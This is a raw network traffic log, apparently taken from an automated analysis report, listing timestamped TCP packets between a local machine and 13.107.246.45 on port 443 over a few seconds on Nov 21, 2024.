                                                                                                                                                                                                            Nov 21, 2024 15:19:08.492335081 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:08.492527008 CET50065443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:08.492696047 CET50065443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:08.492707014 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:08.927747011 CET4435006113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:08.930213928 CET50061443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:08.930253029 CET4435006113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:08.931253910 CET50061443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:08.931263924 CET4435006113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.347753048 CET4435006313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.349517107 CET50063443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.349541903 CET4435006313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.350061893 CET50063443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.350065947 CET4435006313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.357988119 CET4435006213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.358477116 CET50062443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.358486891 CET4435006213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.358930111 CET50062443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.358937025 CET4435006213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.373825073 CET4435006113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.373913050 CET4435006113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.374023914 CET50061443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.374243021 CET50061443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.374258041 CET4435006113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.374315977 CET50061443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.374321938 CET4435006113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.377996922 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.378040075 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.378221989 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.379306078 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.379328012 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.591588020 CET4435006413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.592192888 CET50064443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.592236996 CET4435006413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.621040106 CET50064443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.621082067 CET4435006413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.804933071 CET4435006313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.805012941 CET4435006313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.805084944 CET50063443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.805363894 CET50063443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.805382967 CET4435006313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.805393934 CET50063443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.805399895 CET4435006313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.805649996 CET4435006213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.805818081 CET4435006213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.806391954 CET50062443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.807012081 CET50062443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.807025909 CET4435006213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.807039022 CET50062443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.807044983 CET4435006213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.810328960 CET50067443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.810372114 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.810964108 CET50067443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.812742949 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.812760115 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.812855005 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.813144922 CET50067443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.813168049 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.813317060 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:09.813329935 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.039603949 CET4435006413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.039671898 CET4435006413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.039730072 CET50064443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.039756060 CET4435006413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.039844990 CET50064443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.042215109 CET50064443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.042236090 CET4435006413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.042256117 CET50064443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.042817116 CET4435006413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.042911053 CET4435006413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.042959929 CET50064443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.045552969 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.045609951 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.045703888 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.045876026 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.045892000 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.340794086 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.341228008 CET50065443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.341250896 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.341804981 CET50065443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:10.341814995 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040335894 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040400028 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040451050 CET50065443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040461063 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040496111 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040618896 CET50065443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040730000 CET50065443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040745974 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040756941 CET50065443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.040761948 CET4435006513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.043726921 CET50070443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.043768883 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.043965101 CET50070443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.044110060 CET50070443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.044122934 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.163167953 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.163729906 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.163743973 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.164211035 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.164217949 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.656280994 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.656306028 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.656326056 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.656450033 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.656476021 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.656518936 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.656552076 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.659203053 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.659712076 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.659742117 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.660213947 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.660218954 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.661858082 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.662218094 CET50067443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.662244081 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.662651062 CET50067443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.662659883 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.769196033 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.769807100 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.769840956 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.770271063 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.770277023 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.814176083 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.814250946 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.814254999 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.814311028 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.814398050 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.814414024 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.814426899 CET50066443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.814434052 CET4435006613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.818659067 CET50071443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.818686962 CET4435007113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.818856955 CET50071443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.819031000 CET50071443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:11.819041967 CET4435007113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.114171028 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.114242077 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.114751101 CET50067443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.114782095 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.114984989 CET50067443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.114994049 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.115010977 CET50067443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.115416050 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.115490913 CET4435006713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.115557909 CET50067443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.118216038 CET50072443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.118258953 CET4435007213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.118408918 CET50072443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.118858099 CET50072443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.118875027 CET4435007213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.160572052 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.160646915 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.160691977 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.160726070 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.160744905 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.160806894 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.160806894 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.222373009 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.222459078 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.222522020 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.222541094 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.222747087 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.222872019 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.222877026 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.222894907 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.223257065 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.223359108 CET4435006913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.223433971 CET50069443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.226751089 CET50073443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.226780891 CET4435007313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.227622986 CET50073443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.227715015 CET50073443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.227722883 CET4435007313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.351808071 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.351886034 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.351933002 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.351958036 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.351982117 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.352013111 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.352034092 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.352099895 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.352199078 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.352199078 CET50068443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.352215052 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.352225065 CET4435006813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.355154991 CET50074443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.355186939 CET4435007413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.355359077 CET50074443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.355457067 CET50074443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.355473995 CET4435007413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.771960974 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.772680044 CET50070443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.772711992 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.773309946 CET50070443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:12.773322105 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.214087009 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.214113951 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.214190006 CET50070443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.214222908 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.214241982 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.214299917 CET50070443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.217209101 CET50070443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.217236996 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.217252970 CET50070443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.217259884 CET4435007013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.221504927 CET50075443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.221541882 CET4435007513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.221846104 CET50075443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.223550081 CET50075443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.223566055 CET4435007513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.669512033 CET4435007113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.670074940 CET50071443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.670119047 CET4435007113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.670715094 CET50071443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.670721054 CET4435007113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.903997898 CET4435007213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.905318975 CET50072443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.905318975 CET50072443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.905337095 CET4435007213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:13.905358076 CET4435007213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.119451046 CET4435007313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.120028973 CET50073443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.120059013 CET4435007313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.121480942 CET50073443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.121488094 CET4435007313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.126446962 CET4435007113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.129292965 CET4435007113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.129574060 CET50071443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.129574060 CET50071443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.129784107 CET50071443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.129803896 CET4435007113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.132823944 CET50077443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.132875919 CET4435007713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.133630037 CET50077443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.133752108 CET50077443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.133765936 CET4435007713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.225855112 CET4435007413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.226701021 CET50074443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.226727009 CET4435007413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.227224112 CET50074443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.227229118 CET4435007413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.372251034 CET4435007213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.372433901 CET4435007213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.372567892 CET50072443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.372777939 CET50072443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.372777939 CET50072443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.372790098 CET4435007213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.372797966 CET4435007213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.376091003 CET50078443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.376190901 CET4435007813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.376374006 CET50078443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.376454115 CET50078443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.376478910 CET4435007813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.574141979 CET4435007313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.577282906 CET4435007313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.577352047 CET50073443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.577462912 CET50073443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.577486992 CET4435007313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.577521086 CET50073443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.577528000 CET4435007313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.581377029 CET50079443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.581413031 CET4435007913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.581506968 CET50079443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.581688881 CET50079443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.581702948 CET4435007913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.681055069 CET4435007413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.684024096 CET4435007413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.684180975 CET50074443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.684180975 CET50074443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.684180975 CET50074443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.687625885 CET50080443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.687655926 CET4435008013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.687728882 CET50080443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.687907934 CET50080443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.687922001 CET4435008013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.904665947 CET50074443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:14.904694080 CET4435007413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.007723093 CET4435007513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.008244991 CET50075443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.008264065 CET4435007513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.008729935 CET50075443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.008739948 CET4435007513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.451044083 CET4435007513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:19:15.454199076 CET4435007513.107.246.45192.168.2.6
